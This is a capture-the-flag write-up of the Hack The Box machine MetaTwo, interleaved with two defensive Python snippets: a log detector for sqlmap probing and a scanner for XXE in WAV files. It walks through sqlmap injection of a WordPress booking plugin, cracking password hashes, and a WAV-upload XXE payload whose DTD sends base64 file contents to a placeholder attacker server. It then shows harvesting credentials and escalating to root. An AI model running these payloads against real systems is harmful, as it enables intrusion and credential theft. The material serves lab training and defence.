HackTheBox

Writeups for the Hack The Box machines

https://app.hackthebox.com/machines/MetaTwo

Enumeration

Port scan:

Starting with a quick Rustscan:

    sudo rustscan -a 10.10.11.186 -- -A -T4 -vv

Found 3 open ports:

- 21 FTP
- 22 SSH
- 80 HTTP

Found a domain to resolve in the HTTP scan result, i.e. http://metapress.htb

Added the domain to the hosts file at /etc/hosts & browsed to the website; found a regular page created with WordPress.

Tried an anonymous FTP logon but no luck 😕

As detected earlier the website is running on WordPress, hence ran the WordPress scanner “wpscan”:

Since I used an API token (which can be obtained after registering on the wpscan website), got 28 vulnerabilities:

At this point it was clear that the WordPress site is vulnerable. Also, from the sub-domain enumeration I observed that the ‘/events’ page is running a plugin called “BookingPress” on version 1.0.10; however this plugin wasn’t detected by our WPScan.

Initial foothold:

Searching for an exploit for this plugin & version found this entry, which describes an unauthenticated SQLi, ref: https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357

As per their POC, we can utilise the “_wpnonce” value, which can be extracted from the source code of the “/events” page:

Now, as the plugin has a SQLi vulnerability which we can exploit with sqlmap, we need to save a POST request from Burp. We can reuse the POC code with just a minor modification to change the “_wpnonce” value & send the curl request through Burp using the “-x” parameter.

We have captured the request in Burp:

Now we have to save the Burp request, but before doing that we have to replace the injection parameter in the query with any number, or leave that parameter empty; this is to make sure that sqlmap works properly.

The final request will look somewhat like this:

    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: metapress.htb
    User-Agent: curl/7.85.0
    Accept: */*
    Content-Length: 185
    Content-Type: application/x-www-form-urlencoded
    Connection: close
    
    action=bookingpress_front_get_category_services&_wpnonce=ffcd6fe38a&category_id=33&total_service=1

We save the above content in any file, such as ‘admin.req’, then pass it to sqlmap & use the query below to enumerate the databases:

    sqlmap -r admin.req -p total_service --dbs

- The -r flag tells sqlmap to read the request from the specified file.
- The -p flag tells sqlmap to test only the specified parameter; in our case "total_service" is the vulnerable parameter.
- The --dbs flag tells sqlmap to enumerate all the databases.

After the scan completes we can see that the backend DB is MySQL & there are 2 databases available:

- blog
- information_schema

Now, let’s dump the tables of the blog database first using sqlmap, via this query:

    sqlmap -r admin.req -p total_service -D blog --tables

Got this result:

Similarly we can dump the tables of ‘information_schema’ using sqlmap. Got this long list of tables:

Having dumped both DBs we can search for sensitive data; in the blog DB there is the “wp_users” table, which we can dump using sqlmap with this query:

    sqlmap -r admin.req -p total_service -D blog -T wp_users --dump
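The sqlmap runs above generate a burst of POST requests to admin-ajax.php from one source, first with curl and then with sqlmap itself. As an added defender-side example, not part of this write-up and not the plugin's or sqlmap's code, the Python below parses nginx combined-format access-log lines (a constructed sample using RFC 5737 addresses) and flags a client that either presents a known scanner user agent or posts to admin-ajax.php more than a threshold number of times inside a time window. The user-agent strings and the thresholds are assumptions to tune, not values from the page.

```python
import re
from collections import defaultdict
from datetime import datetime

# nginx "combined" log format: ip - user [time] "METHOD path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Default user agents of common scanners (assumption: easy to override, which is
# why the rate check below exists as well; the write-up's curl UA would not match).
SCANNER_UA = re.compile(r"sqlmap|wpscan|nikto", re.IGNORECASE)
AJAX_PATH = "/wp-admin/admin-ajax.php"


def detect_ajax_probing(lines, burst=10, window_s=60):
    """Return sorted (ip, reason) alerts for scanner UAs and POST bursts to admin-ajax.php."""
    alerts = set()
    posts = defaultdict(list)  # ip -> timestamps of POSTs to admin-ajax.php
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real pipeline would count these separately
        ip, ua = m["ip"], m["ua"]
        if SCANNER_UA.search(ua):
            alerts.add((ip, "scanner user-agent: " + ua.split()[0]))
        if m["method"] == "POST" and m["path"].split("?")[0] == AJAX_PATH:
            posts[ip].append(datetime.strptime(m["time"], TIME_FMT))
    # Sliding window: flag an IP once if any `burst` consecutive POSTs fit inside window_s.
    for ip, ts in posts.items():
        ts.sort()
        for i in range(len(ts) - burst + 1):
            if (ts[i + burst - 1] - ts[i]).total_seconds() <= window_s:
                alerts.add((ip, f"{burst}+ POSTs to {AJAX_PATH} within {window_s}s"))
                break
    return sorted(alerts)


# Constructed sample log: one client browses /events/, sends a curl POST, then a
# 12-request sqlmap burst; a second client makes a single ordinary POST.
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Oct/2022:10:01:01 +0000] "GET /events/ HTTP/1.1" 200 5120 "-" "curl/7.85.0"',
    '203.0.113.7 - - [22/Oct/2022:10:02:11 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 312 "-" "curl/7.85.0"',
] + [
    f'203.0.113.7 - - [22/Oct/2022:10:02:{12 + i:02d} +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" '
    f'200 312 "-" "sqlmap/1.6.12#stable (https://sqlmap.org)"'
    for i in range(12)
] + [
    '192.0.2.10 - - [22/Oct/2022:10:03:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 210 '
    '"http://metapress.htb/events/" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for ip, reason in detect_ajax_probing(SAMPLE_LOG):
        print(ip, reason)
```

admin-ajax.php also carries legitimate Heartbeat and plugin traffic, so the burst threshold should be set from a baseline of normal traffic before alerting on it. The injected value itself (the total_service parameter) lives in the POST body and never reaches the access log; seeing it requires a WAF or application-level log.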

Hash cracking:

Got 2 user hashes & IDs in that table, for ‘admin’ & ‘manager’:

Checked the hash in haiti & found that it can be cracked with Hashcat using mode 400; followed the same on my cracking machine & within a few seconds got the plaintext password of the manager. Also tried to crack the admin hash but failed to do so; seems like it’s a salted hash.

Now, with the gathered credentials tried to log on via FTP but no luck. 😕

Then I went to the WordPress login page which I found in the subdomain enumeration, i.e. “/wp-login”, & logged in using the manager credentials.

On the website found an upload section which is running on PHP, so tried to upload a PHP reverse shell, but the upload is blocked due to security restrictions.

We have manager account access & we can also upload certain file types, but how can we exploit this? After searching for hours I again checked my WPScan results & found this existing vulnerability, which matches my current situation:


WordPress exploitation:

Also found a room in THM with a detailed explanation & exploit for the vulnerability, ref: https://tryhackme.com/room/wordpresscve202129447

Followed the steps from the room, creating the first file, payload.wav, which contains this payload:

    RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSERVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00

And the 2nd file ‘NAMEEVIL.dtd’ contains this data, which reads the ‘/etc/passwd’ content from the machine:

    <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
    <!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >

Now launch an HTTP server in the same directory as the .dtd file:

    php -S 0.0.0.0:PORT

Now upload the malicious .wav to the WordPress application. Quickly after uploading the file we got the response in our terminal in base64 format:

Decoded the string & found the /etc/passwd content, which contains a user ‘jnelson’:
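The payload above works because the media library parses the iXML metadata chunk of an uploaded WAV as XML and resolves the external DTD it declares. As an added example of the defender's counterpart, not code from this write-up or from WordPress, the Python below walks the RIFF chunk list of a WAV file and flags any XML-bearing chunk that declares a DOCTYPE or an external entity, which a legitimate metadata chunk never needs. The two sample files are constructed inline: a minimal benign PCM WAV, and the chunk layout from the write-up with a placeholder host in place of a real server; the chunk-id list and the marker regex are my assumptions.

```python
import re
import struct

# A legitimate iXML/axml metadata chunk never needs a DTD or external entity.
_DTD_MARKERS = re.compile(rb"<!DOCTYPE|<!ENTITY|\bSYSTEM\s*['\"]|\bPUBLIC\s*['\"]", re.IGNORECASE)
# Chunk ids that commonly carry XML metadata inside WAV files (assumption).
_XML_CHUNK_IDS = {b"iXML", b"axml", b"_PMX"}


def iter_riff_chunks(data: bytes):
    """Yield (chunk_id, payload) for each chunk after the 12-byte RIFF/WAVE header.

    Declared sizes are clamped to the buffer, so a file whose RIFF or chunk size
    fields are wrong (the write-up's hand-built payload declares 0xb8 bytes it does
    not have) is still walked and inspected instead of being rejected unseen.
    """
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"WAVE":
        return
    pos = 12
    while pos + 8 <= len(data):
        chunk_id = data[pos:pos + 4]
        size = struct.unpack("<I", data[pos + 4:pos + 8])[0]
        start = pos + 8
        end = min(start + size, len(data))
        yield chunk_id, data[start:end]
        pos = end + (size & 1)  # RIFF pads odd-sized chunks to an even boundary


def find_xxe_markers(data: bytes) -> list:
    """Return one finding per chunk whose XML payload declares a DTD or an external entity."""
    findings = []
    for chunk_id, payload in iter_riff_chunks(data):
        looks_like_xml = chunk_id in _XML_CHUNK_IDS or payload.lstrip().startswith(b"<?xml")
        if not looks_like_xml:
            continue
        match = _DTD_MARKERS.search(payload)
        if match:
            findings.append(f"{chunk_id.decode('ascii', 'replace')}: {match.group(0).decode('ascii', 'replace')}")
    return findings


def _chunk(chunk_id: bytes, payload: bytes) -> bytes:
    """Build a correctly sized, even-padded RIFF chunk."""
    return chunk_id + struct.pack("<I", len(payload)) + payload + (b"\x00" if len(payload) & 1 else b"")


# Constructed sample 1: a minimal benign 16-bit mono PCM WAV (fmt + empty data chunk).
FMT = struct.pack("<HHIIHH", 1, 1, 8000, 16000, 2, 16)
_BODY = _chunk(b"fmt ", FMT) + _chunk(b"data", b"")
BENIGN_WAV = b"RIFF" + struct.pack("<I", 4 + len(_BODY)) + b"WAVE" + _BODY

# Constructed sample 2: the iXML-chunk shape from the write-up with a placeholder host,
# and the same wrong RIFF size (0xb8) as the original so the clamping path is exercised.
XXE_XML = (b'<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '
           b"'http://DTD-HOST.example:8000/evil.dtd'>%remote;%init;%trick;]>\x00")
XXE_WAV = b"RIFF" + struct.pack("<I", 0xB8) + b"WAVE" + b"iXML" + struct.pack("<I", len(XXE_XML)) + XXE_XML

if __name__ == "__main__":
    for name, blob in (("benign.wav", BENIGN_WAV), ("payload.wav", XXE_WAV)):
        print(name, find_xxe_markers(blob) or "clean")
```

This check belongs in the upload path before the file is handed to any media-metadata parser; the structural fix on the parsing side is to load the XML with external entities and DTD processing disabled, which is what the WordPress update for this issue amounts to.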

Now, let’s search for the WordPress wp-config.php file, but for that we need the path of its directory. From the HTML source code we already observed that it’s running nginx, so let’s check the nginx configuration first; to do that we can just change the location in our .dtd file from /etc/passwd to ‘/etc/nginx/sites-enabled/default’.

Edited & sent the request with the payload & quickly got the response in base64 format; decoded it & observed a location which might hold the ‘wp-config.php’ file:

The location observed from the nginx config file is ‘/var/www/metapress.htb/blog’; let’s use this location in our payload request to fetch the configuration file.

Edited & sent the request with the new parameter & got this response, which contains multiple pieces of sensitive information along with the FTP username & password:

Using the gathered credentials I was able to log in to FTP, where I found two directories, blog & mailer:

The mailer directory contains a PHP script ‘send_email.php’; downloaded the script to the Kali machine. Checked the script content & found the jnelson credentials in it:


User flag:

Using the gathered credentials tried to log in via SSH & successfully logged in this time. (pwned!🙂)


Root access:

In the user’s home folder there is a folder called ‘passpie’ which contains the root user’s SSH keys, but they seem to be in GPG-encrypted form:

Did some searching on Google & found ‘passpie’ is a CLI password manager written in Python. Also, there is another file in the ‘passpie’ folder named ‘keys’ which seems to hold the keys for decrypting the passwords. Let’s copy the file to our Kali machine.

The ‘keys’ file contains 2 blocks, public & private; I only copied the private block & created a file in my Kali box.

Converted the ‘keys’ GPG file into ‘john the ripper’ format to crack it:

Using JtR easily cracked the password:

Now that we have the password we can just export the passwords into a file we create:

    passpie list
    touch passwords
    passpie export passwords

And got the root password as well; now we can switch to the root user & collect the root flag. (pwned!🙂)